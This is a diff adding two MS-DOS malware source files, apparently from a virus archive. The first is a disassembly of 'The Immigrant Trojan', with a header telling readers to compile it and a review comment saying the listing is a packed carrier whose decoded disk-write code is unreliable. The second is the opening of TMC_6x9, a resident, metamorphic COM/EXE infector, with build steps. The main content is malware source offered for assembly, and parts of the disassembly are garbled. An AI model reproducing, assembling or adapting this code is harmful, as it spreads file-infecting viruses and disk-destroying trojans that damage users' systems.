@@ -0,0 +1,310 @@ +>>> Article From Evolution #1 - YAM '92 + +Article Title: The Immigrant Trojan Disassembly +Author: Natas Kaupas + + +;***************************************************************************** +; Dissasembly of The Immigrant Trojan (TIT) +; Dissasembly by Dark Angel +; +; Just save this and compile it with TASM. +;***************************************************************************** + +PAGE 59,132 + +data_6e equ 2000h ; (0010:2000=89h) +data_8e equ 0Ch ; (8096:000C=0) +data_10e equ 87F8h ; (8096:87F8=0) +data_11e equ 0CDF3h ; (8096:CDF3=0) + +; Tasm 1.00 will output an extra NOP (90h) on forward memory references +; if the segment is declared after the reference. Segments are declared +; prior to any code to allow re-assembly. + +seg_B segment byte public +seg_B ends + +seg_C segment byte public +seg_C ends + + +;-------------------------------------------------------------- seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:stack_seg_c + + db 0FDh,0FFh, 00h,0FFh,0F8h, 0Eh + db 0B8h, 05h, 00h, 8Eh,0D8h,0BDh + db 01h, 00h,0BAh, 0Dh, 00h,0B4h + db 0FFh,0FFh + db 9 + db 0CDh, 21h, 80h, 3Eh, 0Ch, 00h + db 1Ah, 7Dh, 19h,0B4h, 05h,0B5h + db 00h,0B6h, 00h,0E1h, 79h, 8Ah + db 16h,0F3h,0CDh, 13h,0BAh, 6Ah + db 0E6h,0FEh, 06h,0F8h, 87h,0F3h + db 0EBh,0E0h,0B0h, 02h +loc_2: + mov cx,2BCh + mov dx,0FFC9h + stc ; Set carry flag + mov ds,[di+63h] + mov bx,[di+37h] + int 26h ; Absolute disk write, drive al + mov dx,0E326h + mov ax,0F000h + dec word ptr [si-5] + add [bp+si],al + or ax,440Ah + db 65h, 63h, 6Fh, 64h, 69h, 6Eh + db 0FFh, 7Fh + db 'g system files $' + db 0F8h, 7Fh,0E7h + db 'Ya', 27h, ' been hit' + db 0F8h,0FFh,0F7h + db 'y The Immigr' + db 0E1h, 21h, 61h, 6Eh,0EFh, 54h + db 72h, 6Fh, 6Ah,0F8h, 20h,0CEh + db 0C3h,0C4h, 65h, 64h,0E2h, 6Fh + db 78h,0C3h + db 69h + +locloop_3: + jmp bx ;*Register jump + db 'a. 
[C.S.A.]' + db 0BEh, 2Eh, 02h, 00h, 24h, 00h + db 0F0h + db 13 dup (0) + +seg_a ends + + + +;-------------------------------------------------------------- seg_b ---- + +seg_b segment byte public + assume cs:seg_b , ds:seg_b , ss:stack_seg_c + + db 10h, 00h +data_13 dw 0 +data_14 dw 100h +data_15 dw 0Ch +data_16 dw 0Ch +data_17 dw 12h +data_18 dw 15Ch + +; +; +; Program Entry Point +; +; + + +tit proc far + +start: + push es + push cs + pop ds + mov cx,data_18 ; (80B2:000C=15Ch) + mov si,cx + dec si + mov di,si + mov bx,ds + add bx,data_17 ; (80B2:000A=12h) + mov es,bx + std ; Set direction flag + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push bx + mov ax,2Bh + push ax + retf + mov bp,cs:data_16 ; (80B2:0008=0Ch) + mov dx,ds +loc_6: + mov ax,bp + cmp ax,1000h + jbe loc_7 ; Jump if below or = + mov ax,1000h +loc_7: + sub bp,ax + sub dx,ax + sub bx,ax + mov ds,dx + mov es,bx + mov cl,3 + shl ax,cl ; Shift w/zeros fill + mov cx,ax + shl ax,1 ; Shift w/zeros fill + dec ax + dec ax + mov si,ax + mov di,ax + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + or bp,bp ; Zero ? 
+ jnz loc_6 ; Jump if not zero + cld ; Clear direction + mov es,dx + mov ds,bx + xor si,si ; Zero register + xor di,di ; Zero register + mov dx,10h + lodsw ; String [si] to ax + mov bp,ax +loc_8: + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_9 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_9: + jnc loc_10 ; Jump if carry=0 + movsb ; Mov [si] to es:[di] + jmp short loc_8 ; (0069) +loc_10: + xor cx,cx ; Zero register + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_11 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_11: + jc loc_14 ; Jump if carry Set + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_12 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_12: + rcl cx,1 ; Rotate thru carry + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_13 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h +loc_13: + rcl cx,1 ; Rotate thru carry + inc cx + inc cx + lodsb ; String [si] to al + mov bh,0FFh + mov bl,al + jmp locloop_15 ; (00BB) +loc_14: + lodsw ; String [si] to ax + mov bx,ax + mov cl,3 + shr bh,cl ; Shift w/zeros fill + or bh,0E0h + and ah,7 + jz loc_16 ; Jump if zero + mov cl,ah + inc cx + inc cx + +locloop_15: + mov al,es:[bx+di] + stosb ; Store al to es:[di] + loop locloop_15 ; Loop if cx > 0 + + jmp short loc_8 ; (0069) +loc_16: + lodsb ; String [si] to al + or al,al ; Zero ? 
+ jz loc_18 ; Jump if zero + cmp al,1 + je loc_17 ; Jump if equal + mov cl,al + inc cx + jmp short locloop_15 ; (00BB) +loc_17: + mov bx,di + and di,0Fh + add di,data_6e ; (0010:2000=89h) + mov cl,4 + shr bx,cl ; Shift w/zeros fill + mov ax,es + add ax,bx + sub ax,200h + mov es,ax + mov bx,si + and si,0Fh + shr bx,cl ; Shift w/zeros fill + mov ax,ds + add ax,bx + mov ds,ax + jmp loc_8 ; (0069) + db 41h, 43h, 2Dh, 44h, 43h +loc_18: + push cs + pop ds + mov si,offset data_19 ; (80B2:0158=11h) + pop bx + add bx,10h + mov dx,bx + xor di,di ; Zero register +loc_19: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_21 ; Jump if zero + mov ah,0 +loc_20: + add di,ax + mov ax,di + and di,0Fh + mov cl,4 + shr ax,cl ; Shift w/zeros fill + add dx,ax + mov es,dx + add es:[di],bx + jmp short loc_19 ; (0109) +loc_21: + lodsw ; String [si] to ax + or ax,ax ; Zero ? + jnz loc_22 ; Jump if not zero + add dx,0FFFh + mov es,dx + jmp short loc_19 ; (0109) +loc_22: + cmp ax,1 + jne loc_20 ; Jump if not equal + mov ax,bx + mov di,data_14 ; (80B2:0004=100h) + mov si,data_15 ; (80B2:0006=0Ch) + add si,ax + add data_13,ax ; (80B2:0002=0) + sub ax,10h + mov ds,ax + mov es,ax + xor bx,bx ; Zero register + cli ; Disable interrupts + mov ss,si + mov sp,di + sti ; Enable interrupts + jmp dword ptr cs:[bx] ;* +data_19 db 11h + db 0, 1, 0 + db 292 dup (0) + +tit endp + +seg_b ends + + + +;--------------------------------------------------------- stack_seg_c --- + + stack_seg_c segment word stack 'STACK' + + db 128 dup (0) + +stack_seg_c ends + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm b/MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm new file mode 100644 index 00000000..5b5d538b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tmc_6x9.asm 
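Review bot: The listing is not the trojan's logic but its packed carrier, and the header ("Just save this and compile it with TASM") does not say so: `seg_a` is a run of bytes in which Sourcer's decoding of an `int 26h` at `loc_2` and the fragmented strings (`'g system files $'`, `'y The Immigr'`) appear to sit inside compressed data, while `seg_b` is a bit-stream unpacker — the `shr bp,1` / `dec dx` / `lodsw` / `mov dl,10h` loop from `loc_8` on, the relocation walk at `loc_18`–`loc_22`, and the final `cli` / `mov ss,si` / `mov sp,di` / `jmp dword ptr cs:[bx]` handoff look like an LZEXE-style stub. Reassembling it therefore gives no readable view of the actual payload and does not reproduce the original layout (the separate `stack_seg_c` alone changes it), so the `int 26h` absolute-disk-write reading at `loc_2` should not be cited as the trojan's destructive routine without unpacking first. I would add a header comment such as `; NOTE: seg_a appears to be compressed data and seg_b the decompression/relocation stub; the trojan body is only visible after unpacking, and the instructions Sourcer decoded inside seg_a (including the int 26h at loc_2) are not reliable`. The `data_6e`/`data_10e`/`data_11e` equates at the top carry Sourcer session addresses (`8096:CDF3` etc.) that refer to the analysis run, not to anything in the file, and that is worth saying next to them.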
@@ -0,0 +1,4787 @@ +comment * + TMC_6x9 + Disassembly by + Super/29A and Darkman/29A + + + + TMC_6x9 is a 5393 bytes resident appending COM and EXE virus. Infects at + open file, close file and load and/or execute program. TMC_6x9 has an error + handler, retro structures and is metamorphic in file and memory using Tiny + Mutation Compiler v 1.00 [TMC]. + + To compile TMC_6x9 with Turbo Assembler v 5.0 type: + TASM /M TMC_6X9.ASM + TLINK /x TMC_6X9.OBJ + EXE2BIN TMC_6X9.EXE TMC_6X9.COM +* + +.model tiny +.code + +code_begin: + db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) + dw 100h ; Delta offset + + cld ; Clear direction flag + mov ax,ds ; AX = segment of PSP for current ... + mov [bp+program_seg],ax ; Store segment of PSP for current... + + dec ax ; AX = segment of current Memory C... + mov ds,ax ; DS = segment of current Memory C... + mov ax,ds:[03h] ; AX = size of memory block in par... + + cmp ax,1900h ; Insufficient memory? + jae resize_mem ; Above or equal? Jump to resize_mem + + jmp terminate +resize_mem: + push cs ; Save CS at stack + pop ds ; Load DS from stack (CS) + + mov [bp+mcb_size_],ax ; Store size of memory block in p... + + mov bx,[bp+new_mcb_size] + mov ah,4ah ; Resize memory block + int 21h + jnc allocate_mem ; No error? Jump to allocate_mem + + jmp terminate +allocate_mem: + mov ah,48h ; Allocate memory + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + dec bx ; BX = number of paragraphs to all... + cmp bx,267h ; Insufficient memory? + jae allocat_mem ; Above or equal? Jump to allocat_mem + + jmp terminate +allocat_mem: + int 21h + jnc initiali_tmc ; No error? Jump to initiali_tmc + + jmp terminate +initiali_tmc: + mov es,ax ; ES = segment of allocated memory + add es:[02h],6942h ; Store 16-bit random number + mov word ptr es:[0ch],00h + mov es:[04h],118h ; Store offset of block information + mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... 
+ mov es:[08h],5a8h ; Store offset of data information + + lea si,[bp+tmc_table] ; SI = offset of tmc_table + + push si ; Save SI at stack + + mov bx,730h ; BX = offset of next virus genera... + + jmp initial_tmc +initial_tmc: + mov di,10h ; DI = offset of table of blocks + xor ax,ax ; Zero AX + + jmp tmc_ini_loop +tmc_ini_loop: + add si,ax ; SI = offset of block or instruct... + call decrypt_byte + or al,al ; End of table? + jz calc_blocks ; Zero? Jump to calc_blocks + nop + nop + nop + + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_block ; Above or equal? Jump to exam_block + nop + nop + nop + + cmp al,10h ; Data? + jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp tmc_ini_loop +exam_block: + cmp al,11101111b ; End of block? + jne exam_block_ ; Not equal? Jump to exam_block_ + nop + nop + nop + + mov al,00h ; Don't add anything to offset wit... + + jmp tmc_ini_loop +exam_block_: + cmp al,11101110b ; Beginning of block? + jne next_byte ; Not equal? Jump to next_byte + nop + nop + nop + + mov ax,si ; AX = offset of block identification + dec ax ; AX = offset of block within table + stosw ; Store offset of block within table + + mov ax,0ffffh ; Block is still in one part + stosw ; Store block identification + + mov ax,02h ; Add two to offset within table + + jmp tmc_ini_loop +next_byte: + mov al,02h ; Add two to offset within table + + jmp tmc_ini_loop +calc_blocks: + lea ax,[di-10h] ; AX = number of blocks multiplied... 
+ shr ax,01h ; Divide number of blocks by two + shr ax,01h ; Divide number of blocks by two + mov es:[0ah],ax ; Store number of blocks + + xor ax,ax ; End of table + stosw ; Store end of table + + mov di,10h ; DI = offset of table of blocks + mov si,es:[di] ; SI = offset of block within table + + jmp exam_bloc +split_block: + push bp ; Save BP at stack + mov bp,es:[0ah] ; BP = number of blocks + call rnd_in_range + pop bp ; Load BP from stack + + shl ax,01h ; Multiply random number with two + shl ax,01h ; Multiply random number with two + add ax,10h ; Add ten to random number + + mov di,ax ; DI = random offset within table + + jmp exam_nxt_blo +exam_nxt_blo: + add di,04h ; DI = offset of next offset withi... + + mov si,es:[di] ; SI = offset of next block within... + or si,si ; End of table? + jnz exam_block__ ; Not zero? Jump to exam_block__ + nop + nop + nop + + mov di,10h ; DI = offset of table of blocks + mov si,es:[di] ; SI = offset of block within table + + jmp exam_block__ +exam_block__: + push ax ; Save AX at stack + call decrypt_byte + dec si ; Decrease offset of block within ... + cmp al,11101111b ; End of block? + pop ax ; Load AX from stack + jne exam_bloc ; Not equal? Jump to exam_bloc + nop + nop + nop + + cmp di,ax ; End of table of blocks? + jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo + nop + nop + nop + + jmp exam_tbl_inf +exam_bloc: + mov ax,es:[di+02h] ; AX = block information + + cmp ax,0ffffh ; Block is still in one part? + je exam_bloc_ ; Equal? Jump to exam_bloc_ + nop + nop + nop + + push di ; Save DI at stack + mov di,ax ; DI = offset of end of first part... + mov al,11101001b ; JMP imm16 (opcode 0e9h) + stosb ; Store JMP imm16 + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + sub ax,di ; Subtract offset of end of first ... 
+ stosw ; Store 16-bit immediate + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_bloc_: + call decrypt_byte + + cmp al,11101111b ; End of block? + jne exam_bloc__ ; Not equal? Jump to exam_bloc__ + + jmp end_of_block +exam_bloc__: + cmp al,10h ; Data; CALL; JMP; Data reference...? + ja exam_bloc___ ; Above? Jump to exam_bloc___ + nop + nop + nop + + push ax bp ; Save registers at stack + mov bp,[bp+probability] ; BP = probability + call rnd_in_range + or ax,ax ; Split up block? + pop bp ax ; Load registers from stack + jz split_block ; Zero? Jump to split_block + nop + nop + nop + + jmp exam_bloc___ +exam_bloc___: + cmp al,11101111b ; End of block? + jne exam_blo ; Not equal? Jump to exam_blo + + jmp end_of_block +exam_blo: + cmp al,11101000b ; CALL; JMP; Data reference; Jcc? + jae exam_data ; Above or equal? Jump to exam_data + nop + nop + nop + + cmp al,10h ; Data? + jbe sto_instruct ; Below or equal? Jump to sto_inst... + nop + nop + nop + + sub al,10h ; AL = length of data + + jmp sto_instruct +sto_instruct: + xor cx,cx ; Zero CX + mov cl,al ; CL = length of instruction + + push di ; Save DI at stack + mov di,bx ; DI = offset within next virus ge... + + jmp sto_ins_loop +sto_ins_loop: + call decrypt_byte + stosb ; Store byte of instruction + + dec cx ; Decrease counter + jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop + nop + nop + nop + + mov bx,di ; BX = offset within next virus ge... + pop di ; Load DI from stack + + jmp exam_bloc_ +exam_data: + cmp al,11101101b ; Data reference? + jne exam_blo_ ; Not equal? Jump to exam_blo_ + nop + nop + nop + + push di ; Load DI from stack + mov di,es:[08h] ; DI = offset within data information + + mov ax,bx ; AX = offset within next virus ge... + dec ax ; Decrease offset within next viru... + dec ax ; Decrease offset within next viru... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[08h],di ; Store offset within data informa... 
+ pop di ; Load DI from stack + + jmp exam_bloc_ +exam_blo_: + cmp al,11101110b ; Beginning of block? + jne sto_call_jmp ; Not equal? Jump to sto_call_jmp + nop + nop + nop + + push di ; Save DI at stack + mov di,es:[04h] ; DI = offset within block informa... + + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[04h],di ; Store offset within block inform... + + cmp ax,4c5h ; Block identification of tmc_table_? + jne exam_message ; Not equal? Jump to exam_message + nop + nop + nop + + push si ; Save SI at stack + mov di,bx ; DI = offset within next virus ge... + lea si,[bp+tmc_table] ; SI = offset of tmc_table + mov cx,(table_end-table_begin) + rep movsb ; Move table to top of memory + + mov bx,di ; BX = offset within next virus ge... + pop si ; Load SI from stack + + jmp examine_next +exam_message: + cmp ax,2328h ; Block identification of message? + jne exam_probabi ; Not equal? Jump to exam_probabi + nop + nop + nop + + mov ax,14h ; Probability of including message + cmp [bp+probability],ax ; Include message? + jae examine_next ; Above or equal? Jump to examine_... + nop + nop + nop + + call decrypt_byte + sub al,10h ; AL = length of message + mov ah,00h ; Zero AH + add si,ax ; SI = offset of end of message + + jmp examine_next +exam_probabi: + cmp ax,0bech ; Block identification of probabi...? + jne examine_next ; Not equal? Jump to examine_next + nop + nop + nop + + mov ax,[bp+probability] ; AX = probability + dec ax ; Decrease probability + cmp ax,05h ; Probability too small? + jae store_probab ; Above or equal? Jump to store_pr... + nop + nop + nop + + mov ax,64h ; Reset probability + + jmp store_probab +store_probab: + mov es:[bx],ax ; Store probability + + add bx,02h ; Add two to offset within next vi... + add si,03h ; SI = offset of beginning of next... 
+ + jmp examine_next +examine_next: + pop di ; Load DI from stack + + call decrypt_byte + + jmp exam_bloc___ +sto_call_jmp: + push ax di ; Save registers at stack + mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... + mov ax,bx ; AX = offset within next virus ge... + stosw ; Store offset within next virus g... + + call decrypt_id + stosw ; Store block identification + + mov es:[06h],di ; Store offset within CALL; JMP; J... + pop di ax ; Load registers from stack + + mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... + + add bx,03h ; Add three to offset within next ... + + cmp al,11110000b ; Jump condition? + jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 + + jmp exam_bloc_ +jcc_imm8: + inc bx ; Increase offset within next viru... + inc bx ; Increase offset within next viru... + + jmp exam_bloc_ +split_block_: + mov es:[di+02h],bx ; Store offset within next virus g... + + add bx,03h ; Add three to offset within next ... + + jmp end_of_block +end_of_block: + dec si ; Decrease offset of block within ... + + mov es:[di],si ; Store offset of block within table + + jmp split_block +exam_tbl_inf: + cmp word ptr es:[0ch],00h + jne correct_i16 ; End of second table? Jump to cor... + nop + nop + nop + + pop si ; Load SI from stack + + mov es:[0ch],bx ; Store offset within next virus g... + + add si,(second_table-first_table) + + jmp initial_tmc +correct_i16: + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + sub bx,730h ; Subtract offset of next virus ge... + mov ds:[0eh],bx ; Store length of virus + + mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... + mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... + sub cx,si ; Subtract offset of CALL; JMP; Jc... + + shr cx,01h ; Divide number of CALL imm16; JMP... + shr cx,01h ; Divide number of CALL imm16; JMP... + + jmp jmp_call_loo +jmp_call_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... 
+ + push cx si ; Save registers at stack + mov si,118h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block +find_block: + cmp ax,[si+02h] ; Found block? + je found_block ; Equal? Jump to found_block + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block ; Not zero? Jump to find_block + nop + nop + nop +found_block: + mov dx,[si] ; DX = offset of block + + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + mov al,[bx] ; AL = first byte of instruction + cmp al,11110000b ; Jump condition? + jb sto_call_jm ; Below? Jump to sto_call_jm + nop + nop + nop + + sub byte ptr [bx],10000000b + + inc bx ; BX = offset of 8-bit immediate + + push dx ; Save DX at stack + sub dx,bx ; Subtract offset within next viru... + dec dx ; Decrease 8-bit immediate + + cmp dx,7fh ; 8-bit immediate out of range? + jg invert_jcc ; Greater? Jump to invert_jcc + nop + nop + nop + + cmp dx,0ff80h ; 8-bit immediate out of range? + jl invert_jcc ; Less? Jump to invert_jcc + nop + nop + nop + + mov [bx],dl ; Store 8-bit immediate + inc bx ; BX = offset of end of Jcc imm8 + + mov [bx],1001000010010000b + mov byte ptr [bx+02h],10010000b + pop dx ; Load DX from stack + + jmp correct_i16_ +invert_jcc: + pop dx ; Load DX from stack + + dec bx ; BX = offset of Jcc imm8 + xor byte ptr [bx],00000001b + + inc bx ; BX = offset of 8-bit immediate + mov byte ptr [bx],03h ; Store 8-bit immediate + + inc bx ; BX = offset of JMP imm16 + mov al,11101001b ; JMP imm16 (opcode 0e9h) + + jmp sto_call_jm +sto_call_jm: + mov [bx],al ; Store CALL imm16; JMP imm16 + + inc bx ; BX = offset of 16-bit immediate + sub dx,bx ; Subtract offset within next viru... 
+ + dec dx ; Decrease 16-bit immediate + dec dx ; Decrease 16-bit immediate + + mov [bx],dx ; Store 16-bit immediate + + jmp correct_i16_ +correct_i16_: + dec cx ; Decrease counter + jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo + nop + nop + nop + + mov si,5a8h ; SI = offset of data information + mov cx,ds:[08h] ; CX = offset of end of data infor... + sub cx,si ; Subtract offset of data informat... + + shr cx,01h ; Divide number of data references... + shr cx,01h ; Divide number of data references... + + jmp data_ref_loo +data_ref_loo: + lodsw ; AX = offset of block within data... + push ax ; Save AX at stack + + lodsw ; AX = offset of block within data... + + push cx si ; Save registers at stack + mov si,118h ; SI = offset of block information + mov cx,ds:[04h] ; CX = offset of end of block info... + sub cx,si ; Subtract offset of block informa... + + shr cx,01h ; Divide number of block by two + shr cx,01h ; Divide number of block by two + + jmp find_block_ +find_block_: + cmp ax,[si+02h] ; Found block? + je found_block_ ; Equal? Jump to found_block_ + nop + nop + nop + + add si,04h ; SI = offset of next block in table + + dec cx ; Decrease counter + jnz find_block_ ; Not zero? Jump to find_block_ + nop + nop + nop +found_block_: + mov ax,[si] ; AX = offset of block + pop si cx ; Load registers from stack + pop bx ; Load BX from stack (AX) + + sub ax,730h ; Subtract offset of next virus ge... + mov [bx],ax ; Store 16-bit immediate + + dec cx ; Decrease counter + jnz data_ref_loo ; Not zero? Jump to data_ref_loo + nop + nop + nop + + jmp restore_code +restore_code: + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... 
+ add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_ip] ; Save initial IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+origin_code] ; SI = offset of origin_code + + mov ax,cs:[si] ; AX = first two bytes of original... + mov cs:[100h],ax ; Store first two bytes of origina... + + mov al,cs:[si+02h] ; AL = last byte of original code ... + mov cs:[100h+02h],al ; Store last byte of original code... + + jmp move_virus + + mov ax,[bp+program_seg] ; AX = segment of PSP for current ... + + mov cx,[bp+initial_ss] ; CX = initial SS relative to star... + add cx,10h ; Add ten to initial SS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+initial_sp] ; Save initial SP at stack + + mov cx,[bp+initial_cs] ; CX = initial CS relative to star... + add cx,10h ; Add ten to initial CS relative t... + add cx,ax ; Add segment of PSP for current p... + push cx ; Save CX at stack + + push [bp+incorrect_ip] ; Save incorrect IP at stack + + push ax ; Save segment of PSP for current ... + push [bp+mcb_size] ; Save size of memory block in par... + push ds ; Save DS at stack + + mov cl,00h ; COM executable + cmp [bp+executa_stat],cl + jne move_virus ; COM executable? Jump to move_virus + nop + nop + nop + + lea si,[bp+incorr_code] ; SI = offset of incorr_code + + mov ax,cs:[si] ; AX = first two bytes of incorrec... + mov cs:[100h],ax ; Store first two bytes of incorre... + + mov al,cs:[si+02h] ; AL = last byte of incorrect code + mov cs:[100h+02h],al ; Store last byte of incorrect code + + jmp move_virus +move_virus: + xor ax,ax ; Zero AX + mov ds,ax ; DS = segment of DOS communicatio... 
+ + cmp byte ptr ds:[501h],10h + jne move_virus_ ; Already resident? Jump to move_v... + + jmp virus_exit +move_virus_: + mov byte ptr ds:[501h],10h + + push es ; Save ES at stack + pop ds ; Load DS from stack (ES) + + mov ax,ds:[0ch] ; AX = offset within next virus ge... + sub ax,730h ; Subtract offset of next virus ge... + mov [bp+vir_exit_off],ax + + mov cx,ds:[0eh] ; CX = length of virus + mov [bp+virus_length],cx + + mov si,730h ; SI = offset of next virus genera... + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + mov cl,04h ; Divide by paragraphs + shr di,cl ; DI = length of next virus genera... + inc di ; Increase length of next virus ge... + + mov bx,[bp+mcb_size_] ; BX = size of memory block in par... + sub bx,[bp+new_mcb_size] + sub bx,di ; Subtract length of next virus ge... + + dec bx ; Decrease new size in paragraphs + dec bx ; Decrease new size in paragraphs + + cmp bx,di ; Insufficient memory? + jae resize_mem_ ; Above or equal? Jump to resize_mem_ + + jmp virus_exit +resize_mem_: + mov ah,4ah ; Resize memory block + int 21h + jnc allocat_mem_ ; No error? Jump to allocat_mem_ + + jmp virus_exit +allocat_mem_: + mov bx,di ; BX = number of paragraphs to all... + mov ah,48h ; Allocate memory + int 21h + jc virus_exit ; Error? Jump to virus_exit + nop + nop + nop + + dec ax ; AX = segment of current Memory C... + mov es,ax ; ES = segment of current Memory C... + mov word ptr es:[01h],08h + + inc ax ; AX = segment of PSP for current ... + mov es,ax ; AX = segment of PSP for current ... + + mov cx,[bp+virus_length] + xor si,si ; Zero SI + xor di,di ; Zero DI + rep movsb ; Move virus to top of memory + + push es ; Save ES at stack + push word ptr [bp+vir_exit_off] + + mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... 
+ mov ah,byte ptr [bp+sliding_key] + + retf ; Return far +terminate: + mov ax,4c00h ; Terminate with return code + int 21h + +get_rnd_num proc near ; Get 16-bit random number + push cx ; Save CX at stack + in al,40h ; AL = 8-bit random number + mov ah,al ; AH = 8-bit random number + in al,40h ; AL = 8-bit random number + + xor ax,es:[02h] ; AX = 16-bit random number + + mov cl,ah ; CL = high-order byte of 16-bit r... + rol ax,cl ; AX = 16-bit random number + + mov es:[02h],ax ; Store 16-bit random number + pop cx ; Load CX from stack + + ret ; Return + endp + +rnd_in_range proc near ; Random number within range + or bp,bp ; Zero BP? + jz zero_range ; Zero? Jump to zero_range + nop + nop + nop + + push dx ; Save DX at stack + call get_rnd_num + + xor dx,dx ; Zero DX + div bp ; DX = random number within range + + xchg ax,dx ; AX = random number within range + pop dx ; Load DX from stack + + ret ; Return +zero_range: + xor ax,ax ; AX = random number within range + + ret ; Return + endp + +decrypt_byte proc near ; Decrypt byte of table + mov [bp+ah_],ah ; Store AH + + mov ax,si ; AX = offset within table + sub ax,bp ; Subtract delta offset from offse... + sub ax,offset tmc_table ; Subtract offset of tmc_table fro... + + mul word ptr [bp+sliding_key] + add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... + + xor al,[si] ; AL = byte of decrypted table + + mov ah,[bp+ah_] ; AH = stored AH + + inc si ; Increase offset within table + + ret ; Return + endp + +decrypt_id proc near ; Decrypt block identification in ... + call decrypt_byte + mov ah,al ; AL = byte of decrypted table + + call decrypt_byte + xchg al,ah ; AL = byte of decrypted table + + ret ; Return + endp +virus_exit: + pop es ; Load ES from stack + + mov ah,49h ; Free memory + int 21h + pop bx ; Load BX from stack + + pop ax ; Load AX from stack + mov ds,ax ; DS = segment of PSP for current ... + mov es,ax ; DS = segment of PSP for current ... 
+ + mov ah,4ah ; Resize memory block + int 21h + + lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32 + + pop ax ; Load AX from stack (initial IP) + mov cs:[bx+01h],ax ; Store initial IP + + pop ax ; Load AX from stack (initial CS ...) + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + pop ax ; Load AX from stack (initial SP) + pop ss ; Load SS from stack (initial SS ...) + + mov sp,ax ; SP = stack pointer + + jmp jmp_imm32 + +jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah) + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory +ah_ db 00h ; Accumulator register (high-orde...) +probability dw 32h ; Probability +crypt_key db 00h ; 8-bit encryption/decryption key +sliding_key dw 00h ; 8-bit sliding encryption/decrypt... +executa_stat db 00h ; Executable status +origin_code db 11000011b,02h dup(00h) +incorr_code db 11000011b,02h dup(00h) +initial_cs dw 0fff0h ; Initial CS relative to start of ... +initial_ss dw 0fff0h ; Initial SS relative to start of ... +initial_ip dw 100h ; Initial IP +incorrect_ip dw 100h ; Incorrect IP +initial_sp dw 0fffeh ; Initial SP +new_mcb_size dw 1000h ; New size in paragraphs +mcb_size dw 0ffffh ; Size of memory block in paragraphs +mcb_size_ dw 00h ; Size of memory block in paragraphs +program_seg dw 00h ; Segment of PSP for current process +virus_length dw 00h ; Length of virus +vir_exit_off dw 00h ; Offset of virus_exit +table_begin: +first_table: +tmc_table db 11101111b ; End of block + db 11101110b ; Beginning of block + dw 00h ; Block identification of tmc_table + db 04h ; Four bytes instruction + + db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) + dw 1234h ; Delta offset + + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 02h ; Two bytes instruction + + mov ax,ds ; AX = segment of PSP for current ... + + db 04h ; Four bytes instruction + + mov [bp+1234h],ax ; Store segment of PSP for current... 
